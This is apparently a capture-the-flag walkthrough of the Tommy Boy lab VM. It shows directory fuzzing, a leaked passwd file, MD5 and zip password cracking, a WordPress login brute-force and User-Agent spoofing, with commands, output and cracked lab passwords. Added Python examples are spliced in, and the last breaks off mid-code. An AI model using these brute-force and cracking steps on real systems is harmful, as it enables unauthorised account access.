I am deeply saddened to report that our company’s president, Tom Callahan, has passed away.
I’ve been informed that while this blog appears to be working fine, the main site where customers place orders is down.  I will be working with Michelle and Tommy to restore this ASAP.
Thanks for your patience in this matter.

Sincerely,
Richard
 1 thought on “Announcing the Callahan internal company blog!”

    Michelle Michelle says:	
    July 7, 2016 at 8:21 pm
    Well put boss 😉

    Flag #2: thisisthesecondflagyayyou.txt

» Flag #2

You've got 2 of five flags - keep it up!

Flag data: Z4l1nsky

Imma do a wfuzz on the site with the names I have so far.

[*] exec: wfuzz -c -w /root/hacking/TB/users.lst --hc=404 http://192.168.1.23/FUZZ

********************************************************
* Wfuzz 2.1.3 - The Web Bruteforcer                      *
********************************************************

Target: http://192.168.1.23/FUZZ
Total requests: 5

==================================================================
ID	Response   Lines      Word         Chars          Request    
==================================================================

00001:  C=301      9 L	      28 W	    312 Ch	  "tommy"
00002:  C=301      9 L	      28 W	    314 Ch	  "richard"
00003:  C=301      9 L	      28 W	    315 Ch	  "michelle"
00004:  C=301      9 L	      28 W	    311 Ch	  "nick"

Total time: 0.139456
Processed Requests: 5
Filtered Requests: 1
Requests/sec.: 35.85334


The dirs that contain info are “tommy” and “richard”. I believe the “michelle” and “nick” dirs are fakes, and together with what we found earlier they are some form of fuzz protection.
Let’s fuzz it with rockyou.txt to check. Yep, look at it go.

[*] exec: wfuzz -c -w /usr/share/wordlists/rockyou.txt --hc=404 http://192.168.1.23/FUZZ

********************************************************
* Wfuzz 2.1.3 - The Web Bruteforcer                      *
********************************************************

Target: http://192.168.1.23/FUZZ
Total requests: 14344392

==================================================================
ID	Response   Lines      Word         Chars          Request    
==================================================================

00001:  C=301      9 L	      28 W	    313 Ch	  "123456"
00006:  C=301      9 L	      28 W	    313 Ch	  "andrew"
00009:  C=301      9 L	      28 W	    313 Ch	  "flower"
00010:  C=301      9 L	      28 W	    314 Ch	  "playboy"
00012:  C=301      9 L	      28 W	    316 Ch	  "elizabeth"
00016:  C=301      9 L	      28 W	    315 Ch	  "samantha"
00017:  C=301      9 L	      28 W	    314 Ch	  "chelsea"
00019:  C=301      9 L	      28 W	    313 Ch	  "daniel"
00021:  C=301      9 L	      28 W	    313 Ch	  "111111"
00022:  C=301      9 L	      28 W	    314 Ch	  "matthew"
00023:  C=301      9 L	      28 W	    315 Ch	  "iloveyou"
00024:  C=301      9 L	      28 W	    315 Ch	  "jonathan"
00029:  C=301      9 L	      28 W	    314 Ch	  "brandon"
00030:  C=301      9 L	      28 W	    314 Ch	  "1234567"
00031:  C=301      9 L	      28 W	    315 Ch	  "princess"
00034:  C=301      9 L	      28 W	    313 Ch	  "family"
00038:  C=301      9 L	      28 W	    313 Ch	  "dragon"
00039:  C=301      9 L	      28 W	    313 Ch	  "joseph"
00040:  C=301      9 L	      28 W	    313 Ch	  "sweety"
00041:  C=301      9 L	      28 W	    315 Ch	  "danielle"
00044:  C=301      9 L	      28 W	    313 Ch	  "lauren"
00047:  C=301      9 L	      28 W	    313 Ch	  "yellow"
00048:  C=301      9 L	      28 W	    313 Ch	  "mickey"
00050:  C=301      9 L	      28 W	    313 Ch	  "alexis"
00052:  C=301      9 L	      28 W	    313 Ch	  "junior"
00053:  C=301      9 L	      28 W	    313 Ch	  "summer"
00056:  C=301      9 L	      28 W	    314 Ch	  "william"
00060:  C=301      9 L	      28 W	    315 Ch	  "poohbear"
00062:  C=301      9 L	      28 W	    313 Ch	  "angela"
00063:  C=301      9 L	      28 W	    314 Ch	  "patrick"
00064:  C=301      9 L	      28 W	    316 Ch	  "alexander"
00065:  C=301      9 L	      28 W	    313 Ch	  "adrian"
00070:  C=301      9 L	      28 W	    314 Ch	  "richard"
00071:  C=301      9 L	      28 W	    313 Ch	  "monica"
00079:  C=301      9 L	      28 W	    315 Ch	  "carolina"
00081:  C=301      9 L	      28 W	    313 Ch	  "steven"
00082:  C=301      9 L	      28 W	    313 Ch	  "louise"
00083:  C=301      9 L	      28 W	    313 Ch	  "shorty"
00084:  C=301      9 L	      28 W	    313 Ch	  "tigger"
00088:  C=301      9 L	      28 W	    313 Ch	  "nathan"
00089:  C=301      9 L	      28 W	    313 Ch	  "killer"
00090:  C=301      9 L	      28 W	    313 Ch	  "buster"
00091:  C=301      9 L	      28 W	    313 Ch	  "snoopy"
00093:  C=301      9 L	      28 W	    315 Ch	  "12345678"
00094:  C=301      9 L	      28 W	    313 Ch	  "sandra"
00096:  C=301      9 L	      28 W	    314 Ch	  "gabriel"
00099:  C=301      9 L	      28 W	    313 Ch	  "george"
[....]
56489:  C=301      9 L	      28 W	    311 Ch	  "nick jonas"
56802:  C=301      9 L	      28 W	    313 Ch	  "imagen"
56954:  C=301      9 L	      28 W	    313 Ch	  "euclid"
57284:  C=301      9 L	      28 W	    313 Ch	  "arriba"
57375:  C=301      9 L	      28 W	    311 Ch	  "5683"
57725:  C=200     17 L	     176 W	   1176 Ch	  "#1dancer"
57726:  C=200     17 L	     176 W	   1176 Ch	  "######"
58071:  C=301      9 L	      28 W	    313 Ch	  "perfil"
58349:  C=301      9 L	      28 W	    315 Ch	  "kingfish"
58557:  C=301      9 L	      28 W	    313 Ch	  "guides"
58719:  C=301      9 L	      28 W	    312 Ch	  "cutie pie"
58735:  C=301      9 L	      28 W	    315 Ch	  "front242"
58946:  C=301      9 L	      28 W	    311 Ch	  "alex#1"
59537:  C=301      9 L	      28 W	    312 Ch	  "wendi"
59784:  C=301      9 L	      28 W	    311 Ch	  "rain"
59823:  C=301      9 L	      28 W	    311 Ch	  "pete"
59980:  C=301      9 L	      28 W	    310 Ch	  "max"
60035:  C=301      9 L	      28 W	    313 Ch	  "loveme?"
60041:  C=301      9 L	      28 W	    313 Ch	  "love??"
60074:  C=301      9 L	      28 W	    314 Ch	  "logical"
60313:  C=301      9 L	      28 W	    312 Ch	  "guess?"
60440:  C=301      9 L	      28 W	    314 Ch	  "display"
60538:  C=301      9 L	      28 W	    315 Ch	  "contacts"
60698:  C=301      9 L	      28 W	    313 Ch	  "aztecs"
61041:  C=400     10 L	      35 W	    304 Ch	  "100%me"
61619:  C=301      9 L	      28 W	    313 Ch	  "ocelot"
61797:  C=301      9 L	      28 W	    312 Ch	  "lucky#7"
61873:  C=301      9 L	      28 W	    312 Ch	  "laser"
62129:  C=301      9 L	      28 W	    311 Ch	  "gary"
62161:  C=301      9 L	      28 W	    313 Ch	  "fozzie"
62194:  C=301      9 L	      28 W	    313 Ch	  "estate"
62201:  C=301      9 L	      28 W	    312 Ch	  "extra"
62313:  C=301      9 L	      28 W	    314 Ch	  "cowboys#1"
62500:  C=301      9 L	      28 W	    314 Ch	  "bacchus"
63378:  C=301      9 L	      28 W	    313 Ch	  "simple plan"
63401:  C=301      9 L	      28 W	    311 Ch	  "sexy me"
63423:  C=301      9 L	      28 W	    316 Ch	  "signature"
63477:  C=301      9 L	      28 W	    312 Ch	  "quest"
^CInterrupt: use the 'exit' command to quit

No bueno. Let’s move on for now and see if we can find out how this is done later on.
I pull everything down locally with wget -r -nH --no-parent --reject "index.*" http://192.168.1.23/tommy/ -P /root/hacking/TB/loot/web/ and find 2 files.

--2016-10-03 17:56:57--  http://192.168.1.23/tommy/hi
Reusing existing connection to 192.168.1.23:80.
HTTP request sent, awaiting response... 200 OK
Length: 0
Saving to: ‘/root/hacking/TB/loot/web/tommy/hi’
--2016-10-03 17:56:57--  http://192.168.1.23/tommy/hi.txt
Reusing existing connection to 192.168.1.23:80.
HTTP request sent, awaiting response... 200 OK
Length: 1564 (1.5K) [text/plain]


File “hi” is a 0 byte file, but the “hi.txt” is kinda helpful.

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
tommy:x:1000:1000:Tommy,,,:/home/tommy:/bin/bash
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin


A passwd file with 2 real (shell) users, “root” and “tommy”. Maybe useful later on.
Let's wget richard/.

shockedrichard

What could be freaking him out so much? EXIF that pic!

[*] exec: exif /root/hacking/TB/loot/web/richard/shockedrichard.jpg

EXIF tags in '/root/hacking/TB/loot/web/richard/shockedrichard.jpg' ('Intel' byte order):
--------------------+----------------------------------------------------------
Tag                 |Value
--------------------+----------------------------------------------------------
Software            |Google
Copyright           |Copyright © 1995 Paramount Pictures Corporation. Credit: ©
X-Resolution        |72
Y-Resolution        |72
Resolution Unit     |Inch
Exif Version        |Exif Version 2.2
User Comment        |ce154b5a8e59c89732bc25d6a2e6b90b
Pixel X Dimension   |1600
Pixel Y Dimension   |1029
FlashPixVersion     |FlashPix Version 1.0
Color Space         |Internal error (unknown value 65535)
--------------------+----------------------------------------------------------


Interesting hash in the user comment: ce154b5a8e59c89732bc25d6a2e6b90b. MD5?

root@kali:~# hash-identifier
   #########################################################################
   #	 __  __ 		    __		 ______    _____	   #
   #	/\ \/\ \		   /\ \ 	/\__  _\  /\  _ `\	   #
   #	\ \ \_\ \     __      ____ \ \ \___	\/_/\ \/  \ \ \/\ \	   #
   #	 \ \  _  \  /'__`\   / ,__\ \ \  _ `\	   \ \ \   \ \ \ \ \	   #
   #	  \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \	    \_\ \__ \ \ \_\ \	   #
   #	   \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/	   #
   #	    \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.1 #
   #								 By Zion3R #
   #							www.Blackploit.com #
   #						       Root@Blackploit.com #
   #########################################################################

   -------------------------------------------------------------------------
 HASH: ce154b5a8e59c89732bc25d6a2e6b90b  

Possible Hashs:
[+]  MD5
[+]  Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))

Least Possible Hashs:
[+]  RAdmin v2.x
[+]  NTLM
[+]  MD4
[+]  MD2
[+]  MD5(HMAC)
[+]  MD4(HMAC)
[+]  MD2(HMAC)
[+]  MD5(HMAC(WordPress))
[+]  Haval-128
[+]  Haval-128(HMAC)
[+]  RipeMD-128
[+]  RipeMD-128(HMAC)
[+]  SNEFRU-128
[+]  SNEFRU-128(HMAC)
[+]  Tiger-128
[+]  Tiger-128(HMAC)
[+]  md5($pass.$salt)
[+]  md5($salt.$pass)
[+]  md5($salt.$pass.$salt)
[+]  md5($salt.$pass.$username)
[+]  md5($salt.md5($pass))
[+]  md5($salt.md5($pass))
[+]  md5($salt.md5($pass.$salt))
[+]  md5($salt.md5($pass.$salt))
[+]  md5($salt.md5($salt.$pass))
[+]  md5($salt.md5(md5($pass).$salt))
[+]  md5($username.0.$pass)
[+]  md5($username.LF.$pass)
[+]  md5($username.md5($pass).$salt)
[+]  md5(md5($pass))
[+]  md5(md5($pass).$salt)
[+]  md5(md5($pass).md5($salt))
[+]  md5(md5($salt).$pass)
[+]  md5(md5($salt).md5($pass))
[+]  md5(md5($username.$pass).$salt)
[+]  md5(md5(md5($pass)))
[+]  md5(md5(md5(md5($pass))))
[+]  md5(md5(md5(md5(md5($pass)))))
[+]  md5(sha1($pass))
[+]  md5(sha1(md5($pass)))
[+]  md5(sha1(md5(sha1($pass))))
[+]  md5(strtoupper(md5($pass)))

   --------------------------------------------------------------------------


Yup, looks like it. Let's look at the other services running before we swing into full gear.
 

» :8008

The site hails me with “KEEP OUT”.

This is only for Nick's super secret stuff. If you don't know where to go from here, you're not sup3rl33t enough.
Leave now!
Only me and Steve Jobs are allowed to look at this stuff.
Lol
-Nick


So this is |\|1ck’s 53cr37 dr0p80x! He seems to be operating this site so maybe this is the first guy with interesting privs.

 

» :65534

There should be FTP here, however now I cannot connect.

[*] exec: nc 192.168.1.23 65534
(UNKNOWN) [192.168.1.23] 65534 (?) : Connection refused


OK – port closed… Well that’s unfortunate. A scan of the port gives me no joy either.
 
 

Message Digest number 5

The first step in digging in would be to follow the trail of the password-protected blog post. So I spent quite some time getting hashcat to work and GREAT SUCCESS!

[*] exec: hashcat -m 0 -a 0 ce154b5a8e59c89732bc25d6a2e6b90b /usr/share/wordlists/rockyou.txt

hashcat (v3.10) starting...

OpenCL Platform #1: Mesa, skipped! No OpenCL compatible devices found

OpenCL Platform #2: Intel(R) Corporation
========================================
- Device #1: Intel(R) HD Graphics, 815/1630 MB allocatable, 20MCU
- Device #2: Intel(R) Core(TM) i7-4600U CPU @ 2.10GHz, skipped

Hashes: 1 hashes; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Applicable Optimizers:
* Zero-Byte
* Precompute-Init
* Precompute-Merkle-Demgard
* Meet-In-The-Middle
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash
Watchdog: Temperature abort trigger disabled
Watchdog: Temperature retain trigger disabled

Generating dictionary stats for /usr/share/wordlists/rockyou.txt: 33553434 bytes (23.98%), 3627555 words
Generated dictionary stats for /usr/share/wordlists/rockyou.txt: 139921507 bytes, 14344392 words, 14343297 keyspace

ce154b5a8e59c89732bc25d6a2e6b90b:spanky
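
Before moving on, here is an added example (my code, not the writeup's or the VM author's) that reproduces the triage above offline: it classifies a 32-hex string by length the way hash-identifier does, confirms the hashcat result against a small constructed stand-in for rockyou.txt, and shows what a salted, iterated hash would have changed for a defender. The length table is a simplified assumption and the salts are constructed values.

```python
"""Triage an unknown 32-hex string found in EXIF metadata the way the writeup
does with hash-identifier and hashcat, and show why storing a raw MD5 of a
dictionary word is the real defect.

Added example, not from the original writeup.  DIGEST is the EXIF UserComment
from the page; WORDS is a constructed three-entry stand-in for rockyou.txt.
"""
import hashlib
import re

DIGEST = "ce154b5a8e59c89732bc25d6a2e6b90b"
WORDS = ["password123", "brakepad", "spanky"]   # constructed sample wordlist

HEX_RE = re.compile(r"^[0-9a-f]+$")
# Unsalted digest families by hex length (simplified assumption); the 32-char
# entries are the ones hash-identifier ranks first on the page.
BY_LENGTH = {
    32: ["MD5", "MD4", "NTLM", "RIPEMD-128"],
    40: ["SHA-1", "RIPEMD-160"],
    64: ["SHA-256", "SHA3-256"],
    128: ["SHA-512", "SHA3-512"],
}


def identify(candidate):
    """Possible unsalted digest families for a hex string, [] if not hex."""
    c = candidate.strip().lower()
    if not HEX_RE.match(c):
        return []
    return BY_LENGTH.get(len(c), [])


def find_preimage(digest, words):
    """The word whose raw MD5 equals `digest`, or None (what hashcat -m 0 did)."""
    target = digest.lower()
    for w in words:
        if hashlib.md5(w.encode()).hexdigest() == target:
            return w
    return None


def salted_kdf(word, salt, iterations=100_000):
    """Per-user salted, iterated hash: the storage form that forces one full
    wordlist pass per user instead of one pass for everybody."""
    return hashlib.pbkdf2_hmac("sha256", word.encode(), salt, iterations).hex()


def wordlist_cost(n_words, n_users, iterations=1, salted=False):
    """Hash evaluations needed to test a wordlist against every user."""
    return n_words * iterations * (n_users if salted else 1)


if __name__ == "__main__":
    print("looks like:", identify(DIGEST))
    print("preimage  :", find_preimage(DIGEST, WORDS))
    s1, s2 = b"\x00" * 16, b"\x01" * 16          # constructed salts
    print("same word, two salts differ:",
          salted_kdf("spanky", s1) != salted_kdf("spanky", s2))
    print("rockyou vs 1 user, raw md5 :", wordlist_cost(14_344_392, 1))
    print("rockyou vs 50 users, pbkdf2:",
          wordlist_cost(14_344_392, 50, 100_000, True))
```

The cost figures are the point for a defender: a raw MD5 lets one pass over the wordlist cover every account, while a per-user salt with a work factor multiplies the attacker's effort by users and iterations.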


The password for the hash is “spanky”. Although the pic served as a reminder that this will most likely be the password for the blog post, let's check some services nonetheless. SSH does nothing. Hey – FTP is back up!!

[*] exec: nc 192.168.1.23 65534

220 Callahan_FTP_Server 1.3.5
user tommy
331 Password required for tommy
pass spanky
530 Login incorrect.
pass tommy
etc.etc.etc.


Nope, nothing, but wth - FTP is back up. So it's up for a time, down for a time? Let's move on with the blog post for now.

 

Attack the Blog https://youtu.be/ezVF3sDBv5A

When we put the password in we get our next big break in this very important mess of restoring a backup.

Michelle/Tommy,

This is f’d up.

I am currently working to restore the company’s online ordering system, but we are having some problems getting it restored from backup.  Unfortunately, only Big Tom had the passwords to log into the system.  I can’t find his passwords anywhere.  All I can find so far is a note from our IT guy Nick (whose last day was yesterday) saying:

Hey Richy,

So you asked me to do a write-up of everything I know about the Callahan server so the next moron who is hired to support you idiots can get up to speed faster.

Here’s everything I know:

    You guys are all hopeless sheep :-/
    The Callahan Auto Web site is usually pretty stable.  But if for some reason the page is ever down, you guys will probably go out of business.  But, thanks to *me* there’s a backup called callahanbak.bak that you can just rename to index.html and everything will be good again.
        IMPORTANT: You have to do this under Big Tom’s account via SSH to perform this restore.  Warning: Big Tom always forgets his account password.  Warning #2: I screwed up his system account when I created it on the server, so it’s not called what it should be called.  Eh, I can’t remember (don’t care) but just look at the list of users on the system and you’ll figure it out.

    I left a few other bits of information in my home folder, which the new guy can access via FTP.  Oh, except I should mention that the FTP server is super flaky and I haven’t had the time (i.e. I don’t give a fat crap) to fix it.  Basically I couldn’t get it running on the standard port, so I put it on a port that most scanners would get exhausted looking for.  And to make matters more fun, the server seems to go online at the top of the hour for 15 minutes, then down for 15 minutes, then up again, then down again.  Now it’s somebody else’s problem (did I mention I don’t give a rat’s behind?).

    You asked me to leave you with my account password for the server, and instead of laughing in your face (which is what I WANTED to do), I just reset my account (“nickburns” in case you’re dumb and can’t remember) to a very, VERY easy to guess password.  I removed my SSH access because I *DON’T* want you calling me in case of an emergency.  But my creds still work on FTP.  Your new fresh fish can connect using my credentials and if he/she has half a brain.

Good luck, schmucks!

LOL

-Nick

Michelle/Tommy…WTF are we going to do?!?!  If this site stays down, WE GO OUT OF BUSINESS!!!1!!1!!!!!!!

-Richard

Yeah - that explains perfectly what's going on: nickburns. So restore the backup with Big Tom's account via SSH, and find useful stuff on FTP - which incidentally seems to go online at the top of the hour for 15 minutes, then down for 15 minutes, then up again, then down again.
Let's try and find some password for all the users we have right now.
I run wpscan --url http://192.168.1.23/prehistoricforest/ --wordlist /usr/share/wordlists/rockyou.txt --username <username>, once for every username I have.

[+] Starting the password brute forcer
  [+] [SUCCESS] Login : tom Password : tomtom1                                                          

  Brute Forcing 'tom' Time: 00:07:02 <                        > (24680 / 14344393)  0.17%  ETA: 68:02:15
  +----+-------+------+----------+
  | Id | Login | Name | Password |
  +----+-------+------+----------+
  |    | tom   |      | tomtom1  |
  +----+-------+------+----------+

So Big Tom has the password "tomtom1". On his login page I find some interesting stuff.

Ok so Nick always yells at me for forgetting the second part of my "ess ess eight (ache? H?) password so I'm writing it here:

1938!!

Nick, if you're reading this, I DON'T CARE IF I"M USING THIS THING AS A PASSWORD VAULT. YOU TOOK AWAY MY STICKIES SO I"LL PUT MY PASSWORDS ANY DANG PLACE I WANT.

Yep, I once had a lengthy discussion with a senior sales exec about him putting his passwords on a sticky on his desk. I even guessed the password of his personal e-mail (let's say it was a combo of his daughter, wife and a year) during that convo. So the second part of his SSH pass is "1938". What could be the first part? Still no flag though, so let's dig on; I've spent a lot of time bruteforcing multiple accounts already.

 

FTP

We get to the FTP part but the service is down for the moment, so just have a short wait. Then let's have a look at what "nickburns" has left us on the FTP server at port 65534. Since the password is supposed to be stupidly simple, I'll give it a guess.

root@kali:~# ftp 192.168.1.23 65534
Connected to 192.168.1.23.
220 Callahan_FTP_Server 1.3.5
Name (192.168.1.23:root): nickburns
331 Password required for nickburns
Password:
230 User nickburns logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -lah
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxr-x---   4 nickburns nickburns     4.0k Jul 20 20:42 .
drwxr-x---   4 nickburns nickburns     4.0k Jul 20 20:42 ..
-rw-r--r--   1 root     root            0 Jul 21 22:47 .bash_history
drwx------   2 nickburns nickburns     4.0k Jul  6 22:37 .cache
drwxrwxr-x   2 nickburns nickburns     4.0k Jul  6 22:37 .nano
-rw-rw-r--   1 nickburns nickburns      977 Jul 15 02:37 readme.txt
226 Transfer complete


Yes, simple indeed, nickburns. Simple indeed. Let's have a look at what's in the readme.txt.

cat readme.txt 
To my replacement:

If you're reading this, you have the unfortunate job of taking over IT responsibilities
from me here at Callahan Auto.  HAHAHAHAHAAH! SUCKER!  This is the worst job ever!  You'll be
surrounded by stupid monkeys all day who can barely hit Ctrl+P and wouldn't know a fax machine
from a flame thrower!

Anyway I'm not completely without mercy.  There's a subfolder called "NickIzL33t" on this server
somewhere. I used it as my personal dropbox on the company's dime for years.  Heh. LOL.
I cleaned it out (no naughty pix for you!) but if you need a place to dump stuff that you want
to look at on your phone later, consider that folder my gift to you.

Oh by the way, Big Tom's a moron and always forgets his passwords and so I made an encrypted
.zip of his passwords and put them in the "NickIzL33t" folder as well.  But guess what?
He always forgets THAT password as well.  Luckily I'm a nice guy and left him a hint sheet.

Good luck, schmuck!

LOL.

-Nick

Well, we know where he keeps his L33t <||20|>80><, with a .zip containing the passwords no less. But Big Tom always forgets THAT password, so there is a hint sheet.

Dropboxin' - :8008/NickIzL33t

The site greets us with the following and shows nothing else in the source:

<H1>Nick's sup3r s3cr3t dr0pb0x - only me and Steve Jobs can see this content</H1><H2>Lol</H2>


This is the second time he mentions Steve. Fan-boy? Does he use an iPhone to connect? Let's fire up Burp; maybe I need to send a magic cookie or something, which I fail at doing successfully. So maybe I have to make the website think I'm an iPhone, because I don't think it's an app. I'm looking to change my User-Agent to something with iPhone in it. I find that Burp Suite even has it built-in. N01<3!

burpheader
This is the response.

HTTP/1.1 301 Moved Permanently
Date: Tue, 04 Oct 2016 21:56:11 GMT
Server: Apache/2.4.18 (Ubuntu)
Location: http://192.168.1.23:8008/NickIzL33t/
Content-Length: 324
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://192.168.1.23:8008/NickIzL33t/">here</a>.</p>
<hr>
<address>Apache/2.4.18 (Ubuntu) Server at 192.168.1.23 Port 8008</address>
</body></html>


I follow the redirect and send a GET /NickIzL33t/ request and get another response back.

brainiac

Genius, brainiac indeed. He sure has a way with words. So we gots to know the exact name of the .html to break into nickburns' 'fortress'.
I also find out I could've done it with curl:

curl -A "Mozilla/5.0 (iPhone; CPU iPhone OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B176 Safari/7534.48.3" -v http://192.168.1.23:8008/NickIzL33t
and, 
curl -A "Mozilla/5.0 (iPhone; CPU iPhone OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B176 Safari/7534.48.3" -v http://192.168.1.23:8008/NickIzL33t/ <------


Since we are going to have to specify the User-Agent for this one it's DirBuster-time. These are the settings.

dirbuster

Put it in the oven at 4 threads with about 125 requests/sec and let it simmer for a while. I find that I have to tweak DirBuster, but no matter what it keeps producing "IllegalArgumentException Invalid uri" errors. It's fine that the URI is invalid because you don't play well with 'special' characters - just keep checking and don't stop plzkthnxbye. After about 15 minutes (estimated time to finish was 1 day) I find fallon1.html in the results tab. Let's see what it says.

[*] exec: curl --user-agent "Mozilla/5.0 (iPhone; CPU iPhone OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B176 Safari/7534.48.3" -v http://192.168.1.23:8008/NickIzL33t/fallon1.html

*   Trying 192.168.1.23...
% Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
Dload  Upload   Total   Spent    Left  Speed
0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0* Connected to 192.168.1.23 (192.168.1.23) port 8008 (#0)
> GET /NickIzL33t/fallon1.html HTTP/1.1
> Host: 192.168.1.23:8008
> User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B176 Safari/7534.48.3
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Wed, 05 Oct 2016 14:05:30 GMT
< Server: Apache/2.4.18 (Ubuntu)
< Last-Modified: Fri, 15 Jul 2016 17:44:52 GMT
< ETag: "1cb-537b02d09e6a9"
< Accept-Ranges: bytes
< Content-Length: 459
< Vary: Accept-Encoding
< Content-Type: text/html
<
{ [459 bytes data]
100   459  100   459    0     0   311k      0 --:--:-- --:--:-- --:--:--  448k
* Connection #0 to host 192.168.1.23 left intact
<html>
<title>W 0 W!</title>
Nice work.  Here are the goodies in Nick's personal super secret dropbox:
<p>
<ul>
<li><a href="hint.txt">A hint</a> - you'll need it
<li><a href="flagtres.txt">The third flag</a> - you're not hopeless after all
<li><a href="t0msp4ssw0rdz.zip">Big Tom's encrypted pw backups</a> - because that big tub of dumb can never remember them
</ul>
<!--Note: Still working on file upload capabilities in the P4TCH_4D4MS folder-->
</html>


W00t, flag 3! Now that we have a bit of stuff we can navigate to, let's change the User-Agent in our browser to easily browse to it. I use Firefox and would rather not use any unnecessary extensions: How to.
The contents of hint.txt:

Big Tom,

Your password vault is protected with (yep, you guessed it) a PASSWORD!  
And because you were choosing stupidiculous passwords like "password123" and "brakepad" I
enforced new password requirements on you...13 characters baby! MUAHAHAHAHAH!!!

Your password is your wife's nickname "bev" (note it's all lowercase) plus the following:

* One uppercase character
* Two numbers
* Two lowercase characters
* One symbol
* The year Tommy Boy came out in theaters

Yeah, fat man, that's a lot of keys to push but make sure you type them altogether in one 
big chunk ok?  Heh, "big chunk."  A big chunk typing big chunks.  That's funny.

LOL

-Nick

flagtres.txt

THREE OF 5 FLAGS - you're awesome sauce.

Flag data: TinyHead
Flags so far:
#1: B34rcl4ws
#2: Z4l1nsky
#3: TinyHead

Next I follow the comment about the P4TCH_4D4MS folder and it leads to an image upload form. Could be exploitable.

<!DOCTYPE html>
<html>
<body>

<form action="upload.php" method="post" enctype="multipart/form-data">
Select image to upload:
<input type="file" name="fileToUpload" id="fileToUpload">
<input type="submit" value="Upload Image" name="submit">
</form>

</body>
</html>


I check upload.php

Sorry genius, that file already exists. Sorry, only JPG, JPEG, PNG & GIF files are allowed, douchenozzle! Sorry, your file was not uploaded.  Want me to save your game of Minesweeper though? 


I upload 6packsofsoda.jpg as a test.

The file 6packsofsoda.jpg has been uploaded to /uploads.

Let's check /P4TCH_4D4MS/uploads/

Nick's sup3r s3cr3t dr0pb0x - only me and Steve Jobs can see this content

Lol


I get the very familiar hint, and .../P4TCH_4D4MS/uploads/6packsofsoda.jpg is there. Let's move on to the .ZIP file with password hints and compile a wordlist with these criteria to brute-force it.
 

Lunch-time is Crunch-time

Crunch spits out a pretty big list.

[*] exec: crunch 13 13 -t bev,%%@@^1995 -o /root/hacking/TB/zippass.lst

Crunch will now generate the following amount of data: 812011200 bytes
774 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 58000800 

crunch:  77% completed generating output

crunch: 100% completed generating output


Feed it into fcrackzip when ready.

[*] exec: fcrackzip -D -p /root/hacking/TB/zippass.lst -u -v /root/hacking/TB/loot/nickizl33t/t0msp4ssw0rdz.zip

found file 'passwords.txt', (size cp/uc    332/   641, flags 9, chk 9aad)
checking pw bevG72kn~1995                           

PASSWORD FOUND!!!!: pw == bevH00tr$1995
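
The hint sheet turns a "13 characters baby!" policy into a tiny search space, and the numbers crunch printed above can be derived directly from it. As an added example (my code, not the writeup's or the VM author's), the Python below maps crunch's -t placeholders to character-set sizes and reproduces the 58,000,800 lines and 812,011,200 bytes; the symbol-set size of 33 is an assumption read off from that output (it matches crunch's default symbol set including the space character), and the 200k guesses/s rate is a made-up illustration, not a measured figure.

```python
"""Work out how big the password space really is once Nick's hint sheet is
known.  Added example, not from the original writeup: it reproduces the
arithmetic behind the crunch run on the page (-t bev,%%@@^1995) rather than
generating the list.

Assumptions: crunch's -t placeholders are ',' upper, '%' digit, '@' lower,
'^' symbol; the symbol-set size of 33 is derived from the page's own output
(58000800 / (26*10*10*26*26) == 33).
"""
import math

CLASS_SIZES = {",": 26, "%": 10, "@": 26, "^": 33}
PAGE_PATTERN = "bev,%%@@^1995"          # the pattern used on the page


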